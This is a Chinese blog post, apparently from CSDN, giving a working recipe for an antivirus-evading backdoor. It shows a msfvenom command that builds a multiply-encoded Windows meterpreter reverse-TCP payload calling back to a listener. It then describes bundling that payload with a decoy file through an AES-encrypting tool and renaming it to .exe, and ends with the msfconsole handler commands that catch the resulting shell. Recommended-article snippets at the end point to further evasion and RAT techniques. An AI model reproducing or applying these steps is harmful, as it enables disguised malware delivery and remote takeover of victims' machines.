shellcode后门免杀

最新推荐文章于 2024-09-30 23:39:20 发布
最新推荐文章于 2024-09-30 23:39:20 发布
阅读量3.3k 收藏 1
点赞数
文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Ricklzc/article/details/122418887
版权

生产shellcode

## 基础环境
1、kali

## shellcode生产命令
msfvenom -p windows/meterpreter/reverse_tcp -e x64/xor_dynamic -i 200 LHOST=192.168.199.186 LPORT=22335 -f exe > yunan.exe

免杀环境安装

## 免杀工具地址:https://github.com/Ed1s0nZ/cool
1、go环境安装
	安装Go环境,版本要1.17及以上
    如果是首次安装Go环境,安装完毕后要配置代理,执行以下这两条命令:
        
2、go环境配置
	go env -w GO111MODULE=on
	go env -w GOPROXY=https://goproxy.io,direct
    go install mvdan.cc/garble@latest
    
3、捆绑免杀
	下载本项目到D盘根目录,文件夹名字改为cool;exe可执行文件改名为:cool
	运行cool.exe;
	访问 http://127.0.0.1:9000 
            
4、材料准备
	1、将生成的shellcode exe 和捆绑的文件放在cool的目录下
    
5、选择AESshellcode2进行捆绑
	1、选择语言ruby
    2、输入shellcode的IP地址及端口号
    3、选择捆绑自定义木马、自定义文件
    4、生成
   	5、下载生成后的文件,将txt后缀改成exe

开启监听,等待上线

msfconsole

msf6 > use exploit/multi/handler 

msf6 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp

msf6 exploit(multi/handler) > set lhost 192.168.199.181

msf6 exploit(multi/handler) > set lport 22335

msf6 exploit(multi/handler) > run

等待上线即可

Ricklzc
关注
Kali的学习笔记篇(八)使用msf生成的shellcode制作免杀payload
Kind&红衣的博客
08-13 6622
环境:     kali-linux-2018.2-amd.iso       Visual Studio 2017     msfvenom    更新时间:2018年8月13日07:06:43 直接注入的生成方式(一): //生成c格式的后门,-p指定模块,-e 指定编码,-i指定编码次数,-f 输出格式,-b 去除指定代码 root@kali:~# msfvenom -p wi...
Kali linux 学习笔记(八十四)免杀——backdoor-factory 2020.4.20
闵行小鱼塘
04-20 824
本节学习backdoor-factory,了解下代码洞的用法
免杀基本知识,shellcode混淆免杀
2401_84488537的博客
09-02 1221
1、这里首先使用msf生成基于windows的32位的反弹shell的c/c++语言格式的shellcode。使用visual studio进行生成exe文件,这里使用方式四进行加载,后续会讲到。这里是五种常见的加载代码的方式,选择Release模式,系统为x86,选择生成-->生成解决方案。将生成的exe文件放到相应的win32系统上面运行,msf方面就会上线,(注意目前的shellcode没有做免杀,测试时将杀毒软件关闭)。接下来让我们分析一下这个exe文件时如何上线到正确的地址的。
免杀方法(五)golang加载器cobaltstrike shellcode
qq_56426046的博客
10-04 1974
Go语言目前是最火的编程语言之一,使用go语言编写的加载器,运行shellcode 可以过国内主流杀软,例如360安全卫士、360安全杀毒、火绒、瑞星、金山、 电脑管家。免杀效果很好。而且操作免杀的步骤简单。 项目地址https:/github.com/jax777/shellcode-launch Go语言编译器下载https:/studygolang.com/dlDownloads - The Go Programming Language安装go,下载安装包,傻瓜安装即可。解压下载的项目压缩包,新建6
探秘garble:打造不可轻易逆向的Go代码混淆工具
gitblog_00964的博客
08-29 871
探秘garble:打造不可轻易逆向的Go代码混淆工具 garbleObfuscate Go builds项目地址:https://gitcode.com/gh_mirrors/ga/garble 项目介绍 garble是一个强大的Go语言代码混淆工具,它通过集成到Go工具链中,为你的Go程序穿上一层神秘的外衣。只需简单的一条命令,即可将源代码中的诸多信息进行加密处理,生成难以直接解析的二进制文件...
超强下载免杀
cjs916的专栏
12-12 1174
超强下载免杀By DarkRaY[D.S.T]你在本文可以学到:1.    如何挑选下载者2.    如何免杀下载者①选择下载者现在是个网页木马横飞的年代,而一些比较稳定的远程控制木马的体积都很大,为了方便木马的传播,于是便有了下载者的产生,它是连接起网页木马和隐藏在幕后黑手的沟通桥梁。世面上的下载者随处可见,但一个真正好使用的下载者应该具备什么样的功能呢?在我认为至
PowerShell Payload后门免杀主流杀毒软件
Shellpei的博客
07-03 543
PowerShell Payload 后门测试 目标机:Windows 11 IP:192.168.120.164 攻击机:Kali IP:192.168.120.133 测试项目:https://github.com/machine1337/window-rat cd /opt git clone https://github.com/machine1337/window-rat.git cd window-rat chmod +x exploit.sh ./expl...
免杀对抗】远程加载AES+XOR异或加密的ShellCode加载器 过国内杀软
qq_35942869的博客
03-28 1920
纯萌新,尝试一下免杀,最近也是查了很多资料,面向Github编程借鉴了很多大佬的代码。通过XOR异或加密后再进行AES加密,然后通过修改shellcode加载方式进行简单的免杀
免杀对抗-fscan免杀
qq_73648490的博客
03-28 2871
最近拿fscan进内网老是被杀,看样子需要更新一下fscan了。
[HACK学习呀] - 2020-02-08 干货 - Shellcode免杀总结<二>1
08-03
Shellcode免杀技术概述】 在信息安全领域,Shellcode是一种由低级语言(如汇编)编写的代码,用于在目标系统上执行特定任务,如获取root权限或启动后门。由于Shellcode常用于恶意软件中,为了逃避安全软件的检测...
Avet Tool Kali Linux后门免杀
我的学习笔记
02-28 2551
资源:https://github.com/govolution/avet1、在kali上下载:https://sourceforge.net/projects/tdm-gcc/root@kali:/tmp# wget -c --no-check-certificate https://nchc.dl.sourceforge.net/project/td...
通过包装Go工具链来混淆Go代码-Golang开发
05-26
通过包装Go工具链来混淆Go代码乱码GO111MODULE = on go获取mvdan.cc/garble通过包装Go工具链来混淆Go代码。 需要Go 1.16或更高版本。 garble build [build flags] [packages]该工具还支持garble test,以使用混淆后的代码运行测试,而garble反向则可对诸如堆栈跟踪之类的文本进行反混淆处理。 有关最新用法信息,请参见garble -h。 目的生成一个与常规版本一样工作的二进制文件,但是其有关原始源代码的信息越少越好。 该工具是
Garble-开源
07-09
Garble 是一个可移植的模块化 C++ 程序和库,用于连接 Garmin GPS 接收器。
Python库 | garble-0.0.2.tar.gz
05-16
资源分类:Python库 所属语言:Python 资源全名:garble-0.0.2.tar.gz 资源来源:官方 安装方法:https://lanzao.blog.csdn.net/article/details/101784059
免杀对抗—Powershell混淆&分离免杀&特征修改&填充替换
最新发布
2301_76227305的博客
09-30 803
总的来说powershell免杀的效果要比shellcode要好,上面讲的方法都是通用的,在python混淆免杀的时候,也可以利用python进行分离免杀,或者无文件落地。免杀的思路远远不止这些,会有越来越多的免杀思路,而杀软也会不断迭代升级,二者是相互成长的。最后,以上仅为个人的拙见,如何有不对的地方,欢迎各位师傅指正与补充,有兴趣的师傅可以一起交流学习。
shellcode加密免杀
longwanlian的博客
08-03 1026
先说结论,笔者没成功。
Windows下grable的安装与配置
qq_37309361的博客
07-10 677
garble 安装避坑 Windows 安装
gralde build
lufengdie的专栏
08-18 813
gradle clean 清空build文件夹 gradle build 构建工程,会生成build文件夹构建过程如下: 红框中是 lint 提示,报告输出地址见下图: 打开lint报告: 包含Correctness Performance Internationalization Bi-directional Text Lint
shellcode 免杀
05-29
Shellcode 免杀技术是指通过对 Shellcode 代码进行加密、混淆、变形等手段,使其在被杀毒软件或安全设备检测时无法被识别,从而达到免杀的目的。 以下是一些常见的 Shellcode 免杀技术: 1. 加密:将 Shellcode ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值